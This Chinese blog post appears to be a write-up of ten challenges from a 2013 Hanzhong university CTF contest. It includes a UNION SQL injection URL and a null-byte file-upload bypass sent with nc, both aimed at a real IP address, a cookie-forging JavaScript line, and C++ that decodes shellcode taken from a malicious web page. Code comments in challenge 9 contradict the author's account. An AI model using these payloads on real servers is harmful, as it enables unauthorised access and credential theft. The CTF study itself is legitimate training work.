
我在2013年首届汉中高校攻防赛中通关

2012年09月07日 ⁄ 综合 ⁄ 共 13047字 ⁄ 字号 评论关闭

【写在开篇】

http://218.195.96.59/index.asp

汉中高校攻防赛入口。挺有意思的,大家可以玩玩。

============================================================================

1.

修改网页源代码,出来一个隐藏的text框框(显示的框框要填50),往里面填:Icanseeit

出来:key:HiddenNotHere

2.

unicode(base64(jpg))

解析后:anBn

一看就是base64加密,解密后发现是一堆16进制的字符,我果断想到了把它们写到2进制文件中

然后看生成的文件是图片格式:FFD8-FFD9,改后缀为jpg,就出来key

#include <iostream>
#include <fstream>
#include <list>
#include <string>
#include <iterator>
#include <stdio.h>
#include <stdlib.h>
#include <sstream>

using namespace std;

int main()
{
    // Redirect stdout to 1.jpg in binary mode: every printf below lands in that file.
    freopen("1.jpg","wb",stdout);
    stringstream ss;
    stringstream outss;
    // The hex dump that was pasted into ss here is not preserved in this copy of the page.
    ss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
    char ch[2];
    // Consume the dump two hex digits at a time; a trailing odd digit is silently dropped.
    while(ss>>ch[0]>>ch[1])
    {
        // clear() only resets the error flags; the buffer keeps growing by one pair per iteration.
        outss.clear();
        outss<<ch[0]<<ch[1]<<endl;
        int i;
        // Parse the pair as a base-16 byte value.
        outss>>hex>>i;
        // Emit one raw byte; the file is JPEG data (FFD8 ... FFD9) once all pairs are written.
        printf("%c",(char)i);
    }
    return 0;
}

3.

key:ar4itraryfilesdownlo1ded

星星点灯.mp3的url是经过两次base64编码,那么我们就把title所写的:key.txt

也经过两次base64编码,出来一个信息是:iskey.txt,再2次base64,出来一个showkey.jsp

再来两次base64,爆出key。

这道题不是我想出来的,思路很奇葩,果然是要敢想敢做。

4.

就是一个简单的注入:

http://218.195.96.29/asp/1/tume.asp?id=11'%20Union%20Select%201,password%20from%20admin%20where%20'1'='1

KEY:4b378055b5b521da6e2b7536e21b22c1

MD5解密后:crackmd5

5.

一看就知道是cookie修改: javascript:document.cookie="level="+escape("admin");

然后刷新一下就好了:Smart Boy,KeY Is admin888

6.

Key:QRSTUVWXYZabcdef

竟然是个rar文件

把网马解密后出现后的shellcode拿下来:

#include <iostream>
#include <fstream>
#include <list>
#include <string>
#include <iterator>
#include <stdio.h>
#include <stdlib.h>
#include <sstream>

using namespace std;

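// Parses the two hex digits at in[pos], in[pos + 1] as a byte value.
static int hex_byte(const std::string& in, std::string::size_type pos)
{
    return static_cast<int>(strtol(in.substr(pos, 2).c_str(), NULL, 16));
}

// Decodes a run of %uXXXX tokens into raw bytes. Each token is one 16-bit
// unit; it is emitted low byte first, then high byte (little-endian), which is
// the byte order the original pair-swapping loop produced. Any position that
// does not start a well-formed 6-character %uXXXX token is skipped.
static std::string decode_unicode_escapes(const std::string& in)
{
    std::string out;
    std::string::size_type pos = 0;
    while (pos + 6 <= in.size())
    {
        if (in[pos] != '%' || in[pos + 1] != 'u')
        {
            ++pos;
            continue;
        }
        out.push_back(static_cast<char>(hex_byte(in, pos + 4)));  // low byte
        out.push_back(static_cast<char>(hex_byte(in, pos + 2)));  // high byte
        pos += 6;
    }
    return out;
}

int main()
{
    // Redirect stdout to 1.txt in binary mode so the decoded bytes are written verbatim.
    freopen("1.txt","wb",stdout);
    // The %u-escaped payload lifted from the decoded web-exploit page.
    const std::string escaped = "%u6152%u2172%u071A%uCE00%u7399%u0080%u000D%u0000%u0000%u0000%u6063%u155D%u3E7B%u3C8F%u860D%u76D2%uBE49%uC5AF%uA3F0%u2683%u3B73%uBB72%uBE19%u8928%uAEA2%u9A6E%uDBCA%u06DD%uB1F3%u2FFC%u93CE%u4C1E%uAC6E%u9727%u431E%u82EB%u9FC1%u8095%u7AB4%u266B%uD2C4%uAEC6%u28DD%u9E2E%uA4FE%u5FE6%uADA2%uDD57%uE407%uA291%uF9F7%u86B5%uE867%u5672%u5293%u23C7%u0D47%u705C%uCDD9%u3D9B%u7E0A%uC9B6%u2239%u0337%u7878%u3165%uB8BF%u634F%uC4BB%u1649%u6063%u155D%u3E7B%u3C8F%u0BBF%uDEAE%u40D6%u7D01%uB93F%u944C%u9940%uB608";
    // The result is attacker-supplied data: it is written out as a file for
    // offline inspection (here it turned out to be a RAR archive), never mapped or run.
    const std::string bytes = decode_unicode_escapes(escaped);
    fwrite(bytes.data(), 1, bytes.size(), stdout);
    return 0;
}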

发现是一个加密的rar,暴力破解是人是sb。

我在页面上找msg一个个填进去,填到:QRSTUVWXYZabcdef 成功。

7.

先抓包,存在packet.txt中,用UE打开,在1.asp.;.jpg这里把

asp后面的字节用00代替。

用nc post发送这个包:C:\>nc.exe 218.195.96.29 80 < packet.txt

收到的回馈是:Key is uPloaD00CrACkThaT<center>上传成功

8.

不断地转转。。

msgbox "Can u get this key?~,~!"rem "Key is PasSTHeVbSDeCOd3

(用生成的文件中的字符串代替输入到ss中。。)

不过倒是学会了vb的一个函数: Split(expression[, delimiter[, count[, compare]]])

count为-1的时候,表示所有子字符串

compare为1的时候,表示文字比较。貌似0为2进制比较?

#include <iostream>
#include <cstdio>
#include <math.h>
#include <cstring>
#include <sstream>
#include <stdio.h>

using namespace std;
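int main()
{
    // Redirect stdout to 1.txt; the decoded VBScript line is written there.
    freopen("1.txt","w",stdout);
    // Comma-separated decimal character codes, as handed out by the challenge.
    std::stringstream ss;
    ss<<"109,115,103,98,111,120,32,34,67,97,110,32,117,32,103,101,116,32,116,104,105,115,32,107,101,121,63,126,44,126,33,34,114,101,109,32,34,75,101,121,32,105,115,32,80,97,115,83,84,72,101,86,98,83,68,101,67,79,100,51,34";

    // Read number, emit character, then consume the separator. The final code
    // has no trailing comma, so a loop that flushes on ',' would drop it; reading
    // number-first prints every value including the last one.
    int code;
    while(ss>>code)
    {
        printf("%c",char(code));
        char sep;
        if(!(ss>>sep))
            break;  // end of input reached after the last code
    }
    return 0;
}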

9.

这个只能静态分析,而不是OD下搞起。

IDA下找到关键代码:

.text:00401564                 mov     al, 31h

.text:00401566                 mov     cl, 42h

.text:00401568                 mov     [esp+0Bh], al

.text:0040156C                 mov     [esp+0Eh], al

.text:00401570                 mov     al, 52h

.text:00401572                 push    edi

.text:00401573                 mov     [esp+15h], al

.text:00401577                 mov     [esp+18h], cl

.text:0040157B                 mov     [esp+19h], cl

.text:0040157F                 mov     [esp+1Ah], al

.text:00401583                 mov     [esp+1Dh], al

.text:00401587                 lea     edi, [esp+0Ch]

.text:0040158B                 or      ecx, 0FFFFFFFFh

.text:0040158E                 xor     eax, eax

.text:00401590                 mov     byte ptr [esp+0Ch], 5Ah

.text:00401595                 mov     byte ptr [esp+0Dh], 74h

.text:0040159A                 mov     byte ptr [esp+0Eh], 68h

.text:0040159F                 mov     byte ptr [esp+10h], 78h

.text:004015A4                 mov     byte ptr [esp+11h], 62h

.text:004015A9                 mov     byte ptr [esp+13h], 5Ch

.text:004015AE                 mov     byte ptr [esp+14h], 77h

.text:004015B3                 mov     byte ptr [esp+16h], 41h

.text:004015B8                 mov     byte ptr [esp+17h], 70h

.text:004015BD                 mov     byte ptr [esp+1Bh], 63h

.text:004015C2                 mov     byte ptr [esp+1Ch], 25h

.text:004015C7                 mov     byte ptr [esp+1Eh], 7Ah

.text:004015CC                 mov     byte ptr [esp+1Fh], 56h

.text:004015D1                 mov     byte ptr [esp+20h], 21h

.text:004015D6                 mov     byte ptr [esp+21h], 5Eh

.text:004015DB                 mov     byte ptr [esp+22h], 75h

.text:004015E0                 mov     byte ptr [esp+23h], 0

.text:004015E5                 xor     edx, edx

.text:004015E7                 repne scasb

.text:004015E9                 not     ecx

.text:004015EB                 dec     ecx

.text:004015EC                 jz      short loc_40160C

.text:004015EE

.text:004015EE loc_4015EE:                             ; CODE XREF: .text:0040160Aj

.text:004015EE                 mov     cl, [esp+edx+0Ch]

.text:004015F2                 lea     edi, [esp+0Ch]

.text:004015F6                 xor     cl, 11h

.text:004015F9                 xor     eax, eax

.text:004015FB                 mov     [esp+edx+0Ch], cl

.text:004015FF                 or      ecx, 0FFFFFFFFh

.text:00401602                 inc     edx

.text:00401603                 repne scasb

.text:00401605                 not     ecx

.text:00401607                 dec     ecx

.text:00401608                 cmp     edx, ecx

.text:0040160A                 jb      short loc_4015EE

.text:0040160C

.text:0040160C loc_40160C:                             ; CODE XREF: .text:004015ECj

.text:0040160C                 push    0

.text:0040160E                 lea     eax, [esp+10h]

.text:00401612                 push    0

.text:00401614                 push    eax

.text:00401615                 call    ?AfxMessageBox@@YGHPBDII@Z ; AfxMessageBox(char const *,uint,uint)

.text:0040161A                 pop     edi

大意:有一个字符串,它以esp+0CH开始。然后每个字符xor一个0x11,用c++写了下:

其中的"Zth0x0b\wRApBBRc%RzV!^u"是把esp+0CH用2进制写到文件的生成的字符串。

#include <iostream>
#include <fstream>
#include <list>
#include <string>
#include <iterator>
#include <stdio.h>
#include <stdlib.h>
#include <sstream>

using namespace std;

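// XORs every byte of s with key and returns the result. XOR is its own
// inverse, and this is all the loop at loc_4015EE in the listing does
// (xor cl, 11h on each byte up to the terminator).
static std::string xor_bytes(std::string s, unsigned char key)
{
    for (std::string::size_type i = 0; i < s.size(); ++i)
        s[i] = static_cast<char>(static_cast<unsigned char>(s[i]) ^ key);
    return s;
}

int main()
{
    // Redirect stdout to 1.txt in binary mode so the decoded bytes are written verbatim.
    freopen("1.txt","wb",stdout);
    // The bytes the routine stores at [esp+0Ch]..[esp+22h], in address order,
    // read off the listing above. Three corrections to the pasted string:
    //  * [esp+13h] is 5Ch, a backslash. In a C++ literal it must be written "\\";
    //    "\w" is not a valid escape (compilers warn and keep just 'w'), so the
    //    backslash byte was lost.
    //  * [esp+0Fh] and [esp+12h] are not missing: the two stores of 31h ('1') to
    //    [esp+0Bh] and [esp+0Eh] happen before `push edi`, which moves esp down
    //    by 4 and puts them at +0Fh and +12h.
    //  * [esp+11h] is 62h ('b'); it precedes the '1' at [esp+12h].
    const std::string encoded = "Zth1xb1\\wRApBBRc%RzV!^u";
    const std::string decoded = xor_bytes(encoded, 0x11);
    fwrite(decoded.data(), 1, decoded.size(), stdout);
    return 0;
}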

然后生成的文件为:Key!i!sfCPaSSCr4CkG0Od

Ps:!(感叹号)是因为[esp+0Fh]、[esp+12h]都没有,我就用“0”代替了,结果果然不影响,哈哈。

10.

key:.Ne7c#CR4cK1sG0Ok

发现它是用C# dotnet写的,果断上.NET Reflector 7.0.0.420 Crack

然后源代码就出来了,逆推key就行。
